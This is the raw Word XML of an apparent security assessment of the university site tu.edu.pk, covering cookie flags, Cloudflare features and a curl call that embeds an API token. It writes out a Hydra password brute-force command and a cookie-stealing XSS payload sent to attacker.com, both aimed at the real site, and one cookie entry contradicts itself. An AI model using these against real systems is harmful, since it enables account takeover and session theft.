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52" w:rsidRPr="009A74F9" w:rsidRDefault="00A06052" w:rsidP="009A74F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numP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74F9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Security Features Used:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A06052">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A06052">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1.wpdm_client:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Secure Flag (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A06052">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✓</w:t>
      </w:r>
      <w:r>
        <w:t>): Ensures this cookie is only transmitted over HTTPS, preventing interception over unencrypted HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Flag (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A06052">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✓</w:t>
      </w:r>
      <w:r>
        <w:t>): Prevents client-side scripts (e.g., JavaScript) from accessing the cookie, reducing the risk of theft via XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A06052">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A06052">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2.wordpress_test_cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRDefault="00A44824" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">Flag </w:t>
      </w:r>
      <w:r w:rsidR="00A06052">
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A06052">
        <w:t xml:space="preserve"> Protects the cookie from being accessed by client-side scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRDefault="00A06052" w:rsidP="00892D1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Secure </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Flag</w:t>
      </w:r>
      <w:r w:rsidR="0040144C">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0040144C" w:rsidRPr="00A06052">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✓</w:t>
      </w:r>
      <w:r w:rsidR="0040144C">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>: This cookie can be transmitted over both HTTP and HTTPS, making it less secure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00892D1A" w:rsidRDefault="00A06052" w:rsidP="00892D1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0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E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14" w:rsidRDefault="00032514" w:rsidP="00892D1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00032514" w:rsidRDefault="00032514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3B77A5" w:rsidP="003B77A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wpdm_client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> value </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>"f0100d2fa7e696e7756b7112ae69d5d9"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> you mentioned appears to be a hashed or encrypted value, which may represent a client identifier, session ID, or some other piece of data that has been hashed for security or privacy reasons.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B77A5" w:rsidRDefault="003B77A5" w:rsidP="003B77A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E5EF2" w:rsidRDefault="003B77A5" w:rsidP="003B77A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B77A5">
        <w:t>The value "WP%20Cookie%20check" is likely a URL-encoded string. When decoded, it reads as "WP Cookie check".</w:t>
      </w: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6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0C7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687018" w:rsidRPr="00687018" w:rsidRDefault="00687018" w:rsidP="0068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018">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cloudflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006870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87018">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>provides several security features to protect websites from cyber threats:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00687018" w:rsidRPr="00687018" w:rsidRDefault="00687018" w:rsidP="006870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018">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00687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Protection</w:t>
      </w:r>
      <w:r w:rsidRPr="006870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7018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687018">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> helps mitigate Distributed Denial of Service (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00687018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687018">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) attacks by filtering malicious traffic before it reaches your server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00687018" w:rsidRPr="00687018" w:rsidRDefault="00687018" w:rsidP="006870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18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Firewall (WAF)</w:t>
      </w:r>
      <w:r w:rsidRPr="00687018">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Protects websites from common threats such as SQL injection, XSS attacks, and other vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00687018" w:rsidRPr="00687018" w:rsidRDefault="00687018" w:rsidP="006870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18">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SSL/TLS Encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="006870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7018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687018">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> helps implement HTTPS (SSL/TLS) for secure data transmission between the server and users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00687018" w:rsidRDefault="00687018" w:rsidP="006870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18">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bot Mitigation</w:t>
      </w:r>
      <w:r w:rsidRPr="006870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7018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  <w:r w:rsidRPr="00687018">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> can detect and block bots and automated attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051520C" w:rsidRDefault="0051520C" w:rsidP="0051520C">
      <w:p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bot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (short for "robot") is a software application that performs automated tasks on the internet. Bots can carry out tasks that are usually repetitive, like scraping data from websites, sending automated </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>messages, or performing brute-force attacks on login pages. While some bots are legitimate (like search engine crawlers indexing a website), others can be malicious and used for attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051520C" w:rsidRDefault="0051520C" w:rsidP="0051520C">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0051520C" w:rsidRDefault="0051520C" w:rsidP="00515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018" w:rsidRDefault="00687018" w:rsidP="0068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018" w:rsidRPr="00687018" w:rsidRDefault="00687018" w:rsidP="0068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5EF2" w:rsidRDefault="002E5EF2" w:rsidP="00687018"/>
    <w:p w:rsidR="002E5EF2" w:rsidRPr="00D32586" w:rsidRDefault="00D32586" w:rsidP="00892D1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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&lt;script&gt;   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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document.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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='http://attacker.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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steal.php?cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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=' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 &lt;/script&gt;</w:t>
      </w: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2E5EF2" w:rsidRDefault="002E5EF2" w:rsidP="00892D1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00032514" w:rsidRDefault="00032514" w:rsidP="00032514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B511E" w:rsidRPr="00D32586" w:rsidRDefault="00032514" w:rsidP="00032514">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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2586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curl -v -H "Authorization: Token token=bE8FGxhIKuf0Ak4XRnMn3Qx4v9c3SNgieZNEhcINEkU" </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="009B511E" w:rsidRPr="00D32586">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b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https://tu.edu.pk/wp-login.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009B511E" w:rsidRDefault="009B511E" w:rsidP="00032514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32514" w:rsidRPr="009B511E" w:rsidRDefault="009B511E" w:rsidP="00032514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51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Wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B51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generate token </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00032514" w:rsidRDefault="005A1209" w:rsidP="0003251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388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C2D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B6" w:rsidRDefault="00622DB6" w:rsidP="00032514">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="00622DB6" w:rsidP="00032514">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="00622DB6" w:rsidP="00622DB6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curl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="00622DB6" w:rsidP="00622DB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The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tool is used to send HTTP requests to a server. In this scenario, it is being used to interact with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>https://tu.edu.pk/wp-login.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL, which is the WordPress login endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="00622DB6" w:rsidP="00622DB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If the URL starts with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>https://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will send an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> request, which is a secure version of HTTP using SSL/TLS for encryption</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="0040144C" w:rsidP="00622DB6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22DB6" w:rsidRDefault="00622DB6" w:rsidP="00622DB6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-v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="00622DB6" w:rsidP="00622DB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This flag stands for "verbose mode." It provides detailed information about the request and response, including:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="00622DB6" w:rsidP="00622DB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lastRenderedPageBreak/>
        <w:t>The exact request sent to the server (headers and data).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="00622DB6" w:rsidP="00622DB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The server's response headers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="00622DB6" w:rsidP="00622DB6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Useful for debugging or analyzing server responses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="0040144C" w:rsidP="00622DB6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22DB6" w:rsidRDefault="00622DB6" w:rsidP="00622DB6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-H</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="00622DB6" w:rsidP="00622DB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This flag is used to specify custom HTTP headers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="00622DB6" w:rsidP="00622DB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In this case, the custom header </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Authorization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is being sent with the request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="0040144C" w:rsidP="00622DB6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22DB6" w:rsidRDefault="00622DB6" w:rsidP="00622DB6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>"Authorization: Token token=bE8FGxhIKuf0Ak4XRnMn3Qx4v9c3SNgieZNEhcINEkU"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="00622DB6" w:rsidP="00622DB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This is an authorization header.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="00622DB6" w:rsidP="00622DB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It contains an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>API token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (a string of characters) used to authenticate the request with the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="00622DB6" w:rsidP="00622DB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The server uses this token to verify that the client has permission to access specific resources or perform certain actions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="00622DB6" w:rsidP="00032514">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="00622DB6" w:rsidP="00032514">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="00622DB6" w:rsidP="00032514">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRDefault="00622DB6" w:rsidP="00032514">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00622DB6" w:rsidRPr="00622DB6" w:rsidRDefault="00622DB6" w:rsidP="00032514">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00032514" w:rsidRPr="00892D1A" w:rsidRDefault="00032514" w:rsidP="00032514">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRDefault="00FD286F" w:rsidP="00FD286F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numP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286F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Hydra tool use:</w:t>
      </w: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892D1A" w:rsidRDefault="00892D1A" w:rsidP="00892D1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5213350" cy="2768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06C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66" cy="27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1A" w:rsidRDefault="00892D1A" w:rsidP="00892D1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D1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Got Username and password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HYDRA tool </w:t>
      </w:r>
      <w:r w:rsidRPr="00892D1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(“hydra -L /home/kali/Desktop/names.txt -P /home/kali/Desktop/rockyou.txt -s 443 -S </w:t>
      </w:r>
      <w:r w:rsidRPr="00892D1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tu.edu.pk https-post-form "/wp-login.php:user_login=^USER^&amp;user_pass=^PASS^&amp;wp-submit=Log+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00892D1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In:The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00892D1A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username and password you entered is incorrect." -v -f –d”) </w:t>
      </w:r>
      <w:r w:rsidRPr="00892D1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this is not valid. So, use any other method to get credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00905C08" w:rsidRPr="00892D1A" w:rsidRDefault="00905C08" w:rsidP="00892D1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2D1A" w:rsidRDefault="00905C08" w:rsidP="00905C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="tex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05C08">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="tex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Payload injection:</w:t>
      </w:r>
      <w:r w:rsidR="00892D1A" w:rsidRPr="00905C08">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1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905C08" w:rsidRDefault="00905C08" w:rsidP="00905C08">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905C08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>&lt;script&gt;document.location='http://attacker.com/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00905C08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>steal.php?cookie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00905C08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>='+document.cookie&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00905C08" w:rsidRDefault="00905C08" w:rsidP="00905C08">
      <w:r w:rsidRPr="00905C08">
        <w:t>The payload is an example of a Cross-Site Scripting (XSS) attack, specifically a stored XSS attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00905C08" w:rsidRDefault="00905C08" w:rsidP="0090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C08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tu.edu.pk</w:t>
      </w:r>
      <w:r w:rsidRPr="00905C08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, could block the attack </w:t>
      </w:r>
      <w:r w:rsidR="00903196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">on login page </w:t>
      </w:r>
      <w:r w:rsidRPr="00905C08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>for several reasons:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00905C08" w:rsidRPr="00905C08" w:rsidRDefault="00905C08" w:rsidP="0090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5C08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol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5C08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application Firewall (WAF)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00905C08" w:rsidRPr="00905C08" w:rsidRDefault="00905C08" w:rsidP="0090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5C08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol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5C08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00905C08" w:rsidRPr="00905C08" w:rsidRDefault="00905C08" w:rsidP="0090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5C08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol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5C08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Content Security Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00905C08" w:rsidRDefault="00905C08" w:rsidP="0090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05C08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol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5C08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Browser-based Protection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00905C08" w:rsidRPr="00905C08" w:rsidRDefault="00905C08" w:rsidP="0090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05C08" w:rsidRPr="00905C08" w:rsidRDefault="00905C08" w:rsidP="00905C0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C08" w:rsidRPr="00905C08" w:rsidRDefault="00905C08" w:rsidP="00905C08"/>
    <w:p w:rsidR="00A06052" w:rsidRDefault="00A06052" w:rsidP="009A74F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numP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A74F9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Steps to Evaluate the Security of These Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A74F9" w:rsidRPr="009A74F9" w:rsidRDefault="009A74F9" w:rsidP="009A74F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440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06052" w:rsidRPr="009A74F9" w:rsidRDefault="00A06052" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Step 1: Check HTTPS Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="009A74F9" w:rsidRDefault="00A06052" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Use tools like Redirect checker to test if tu.edu.pk enforces HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="009A74F9" w:rsidRDefault="00A06052" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure all </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>pages</w:t>
      </w:r>
